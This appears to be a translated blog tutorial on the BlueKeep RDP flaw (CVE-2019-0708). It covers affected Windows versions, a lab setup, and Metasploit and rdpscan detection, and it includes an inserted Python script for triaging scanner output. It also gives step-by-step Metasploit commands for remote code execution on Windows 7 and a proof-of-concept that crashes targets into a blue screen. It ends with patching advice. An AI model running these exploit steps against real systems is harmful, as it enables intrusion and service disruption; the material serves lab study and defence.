CVE-2019-0708 Windows Remote Desktop Protocol (RDP) vulnerability exploitation and hardening


Vulnerability description

  A remote code execution vulnerability exists in Remote Desktop Services (previously known as Terminal Services) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. It is also known as the "Remote Desktop Services Remote Code Execution Vulnerability".

Affected versions

  • Windows XP SP3 x86
  • Windows XP Professional x64 Edition SP2
  • Windows XP Embedded SP3 x86
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 x64 version SP2
  • Windows Server 2003 R2 SP2
  • Windows Server 2003 R2 x64 Edition SP2
  • Windows Vista SP2
  • Windows Vista x64 version SP2
  • Windows 7

Setting up the vulnerable environment

Thunder download:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

When creating the virtual machine, remember to choose the Professional edition to install instead of the default Home edition (the Home edition has no remote connection).

Enable remote connection.

Vulnerability detection

Kali tool


Start msf

msfconsole

Search for the vulnerability detection exp

search 2019_0708


Load the module and set the IP to be checked

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.234.129
run

The prompt "The target is vulnerable" indicates that the vulnerability exists.

To check multiple IPs, set the IP range in the following format:

set rhosts 192.168.234.128-133


Detection tool under Windows

Tool download address: https://github.com/k8gege/CVE-2019-0708

Tool usage:

# Batch scan
rdpscan.exe 192.168.234.1-192.168.234.254
# Single scan
rdpscan.exe 192.168.234.129

If the output shows "VULNERABLE - CVE-2019-0708", the vulnerability exists.
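
A defender-side triage of the output of the two scanners above, as an added example that is not part of the original post: it expands the scanned range, marks hosts showing either positive marker quoted above, and lists hosts without a verdict for rescanning. The "ip - verdict" line layout, the SAFE prefix and the sample output are assumptions constructed for illustration.

```python
import ipaddress
import re

# The two positive markers quoted on this page (Metasploit scanner, rdpscan.exe).
VULN_MARKERS = ("The target is vulnerable", "VULNERABLE - CVE-2019-0708")
# Assumptions: result lines read "<ip>[:port] - <verdict text>", clean verdicts start with "SAFE".
LINE_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?\s+-\s+(.*)")

def expand_range(spec):
    """Expand 'a.b.c.d', 'a.b.c.d-N' (rhosts style) or 'a.b.c.d-e.f.g.h' (rdpscan style)."""
    start, _, end = (part.strip() for part in spec.partition("-"))
    if "." not in end:  # bare last octet, or no range at all
        end = start.rsplit(".", 1)[0] + "." + end if end else start
    first, last = ipaddress.IPv4Address(start), ipaddress.IPv4Address(end)
    if last < first:
        raise ValueError(f"range ends before it starts: {spec}")
    return [str(ipaddress.IPv4Address(n)) for n in range(int(first), int(last) + 1)]

def classify(text):
    """Map the verdict text of one result line to vulnerable / safe / unresolved."""
    if any(marker in text for marker in VULN_MARKERS):
        return "vulnerable"
    return "safe" if text.startswith("SAFE") else "unresolved"

def triage(scope, output):
    """Return (vulnerable, unresolved): hosts to patch first, hosts to scan again."""
    verdicts = {}
    for line in output.splitlines():
        match = LINE_RE.search(line)
        if match:
            verdicts[match.group(1)] = classify(match.group(2))
    hosts = expand_range(scope)
    vulnerable = [h for h in hosts if verdicts.get(h) == "vulnerable"]
    # A host with no result line is not a clean host: keep it on the rescan list.
    unresolved = [h for h in hosts if verdicts.get(h, "unresolved") == "unresolved"]
    return vulnerable, unresolved

# Constructed sample output, not captured from a real scan.
SAMPLE = """\
[+] 192.168.234.129:3389 - The target is vulnerable.
192.168.234.130 - SAFE - Target appears patched
192.168.234.131 - UNKNOWN - no connection - timeout
192.168.234.132 - VULNERABLE - CVE-2019-0708
"""

if __name__ == "__main__":
    print(triage("192.168.234.128-133", SAMPLE))
```

Hosts on the second list (no response, timeout, or no line at all) still need a verdict before the range is considered patched.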

Exploit

Exploitation of this vulnerability is subject to significant restrictions; the RCE scripts currently found are only for Windows 7 systems.

Remote code execution

Attack machine: Kali
Target machine: Windows 7

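# Start msf
msfconsole

# Search for the 2019-0708 vulnerability module
search 2019-0708
# Select the exploit module
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Set the target IP
set rhosts 192.168.234.132
# Change the target system type (depending on the situation)
set target 1
# Run the attack
run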


If "set target 1" does not work, we need to try the exp scripts for other systems; "show targets" lists the exp scripts for each corresponding system.


Blue screen

Tool used:
https://github.com/CVE-2019-0708/CVE-2019-0708

Usage:

#python PoC.py ip
python PoC.py 192.168.234.129

It can blue-screen WinXP | XP Embedded | Win7 | Server 2003 | Server 2008 systems.

Vulnerability hardening

  1. Install security software such as 360 or Tinder.
  2. Install the official Microsoft patch: https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708


Origin blog.csdn.net/weixin_41924764/article/details/109522132